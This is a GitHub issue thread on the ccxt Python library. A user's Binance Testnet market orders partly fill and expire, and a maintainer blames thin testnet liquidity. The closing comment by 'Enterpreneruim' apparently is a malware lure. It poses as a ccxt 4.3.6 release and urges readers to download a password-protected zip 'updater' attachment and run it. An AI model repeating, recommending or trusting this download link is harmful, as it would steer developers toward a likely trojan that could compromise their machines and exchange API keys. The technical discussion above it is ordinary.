### ISSUE TITLE
Binance Testnet - orders expired for a longer time before they get filled

### ISSUE THREAD

**Issue by LeRobert** [ccxt/ccxt#21996]
### Operating System

Windows 11 Enterprise, V. 10.0.22631 Build 22631

### Programming Languages

Python

### CCXT Version

4.2.83

### Description

I'm creating spot market orders on Binance Testnet with ccxt in Python. 

Almost all orders are getting expired for some time before filling them. I calculate in a loop remaining quantity and repeat the order with this quantity but I think this process takes too long. E.g. for filling buy order for 1124 LTC/USDT the process takes 4 minutes. For three cryptocurrencies it can take 20 minutes.

When an order has the status 'expired', it has such structure:

{'info': {'symbol': 'BNBUSDT', 'orderId': '3634181', 'orderListId': '-1', 'clientOrderId': 'x-R4BD3S82ebf2f4d30ecb855e4c07e0', 'price': '0.00000000', 'origQty': '186.62600000', 'executedQty': '70.54700000', 'cummulativeQuoteQty': '41486.54240000', 'status': 'EXPIRED', 'timeInForce': 'GTC', 'type': 'MARKET', 'side': 'SELL', 'stopPrice': '0.00000000', 'icebergQty': '0.00000000', 'time': '1711831380419', 'updateTime': '1711831380419', 'isWorking': True, 'workingTime': '1711831380419', 'origQuoteOrderQty': '0.00000000', 'selfTradePreventionMode': 'EXPIRE_MAKER'}, 'id': '3634181', 'clientOrderId': 'x-R4BD3S82ebf2f4d30ecb855e4c07e0', 'timestamp': 1711831380419, 'datetime': '2024-03-30T20:43:00.419Z', 'lastTradeTimestamp': None, 'lastUpdateTimestamp': 1711831380419, 'symbol': 'BNB/USDT', 'type': 'market', 'timeInForce': 'GTC', 'postOnly': False, 'reduceOnly': None, 'side': 'sell', 'price': 588.0695479609338, 'triggerPrice': None, 'amount': 186.626, 'cost': 41486.5424, 'average': 588.0695479609338, 'filled': 70.547, 'remaining': 116.079, 'status': 'expired', 'fee': None, 'trades': [], 'fees': [], 'stopPrice': None, 'takeProfitPrice': None, 'stopLossPrice': None}

Is this normal for the Binance Testnet or am I missing something?

### Code

```
# in __init__:

        self.exchange = ccxt.binance({
            'apiKey': api_key,
            'secret': api_secret,
            'enableRateLimit': True,
            'options': {
                'defaultType': 'spot'
            }
        })

# in _buy_order I call create_market_buy_order without any options, same for _sell_order:

order = self.exchange.create_market_buy_order(symbol=pair, amount=amount)

# when fetching order status I check for remaining quantity if order is expired and repeat the buy or sell order with that quantity:

order = self.exchange.fetch_order(order_id, pair)
status = order["status"].lower()

if status == 'expired':
                    initial_quantity = float(order.get("info", {}).get("origQty", 0))
                    executed_quantity = float(order.get("info", {}).get("executedQty", 0))
                    remaining_quantity = initial_quantity - executed_quantity

```

**Comment by LeRobert** [comment]
> Hello @LeRobert, I think that might be related to the lack of liquidity in the testnet environment.

Thank you, Carlos, for the reply. This confirms my assumptions. I intend to work with cryptos from the top 200 regarding the MC and this might happen in a production environment at some point. 

I was thinking of placing orders in parallel for all cryptos to be traded, to speed up the process (now they are filled sequentially). The method create_orders is not supported for the spot market as I saw in the code. Probably the async version of create_order could be a solution for this?

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.
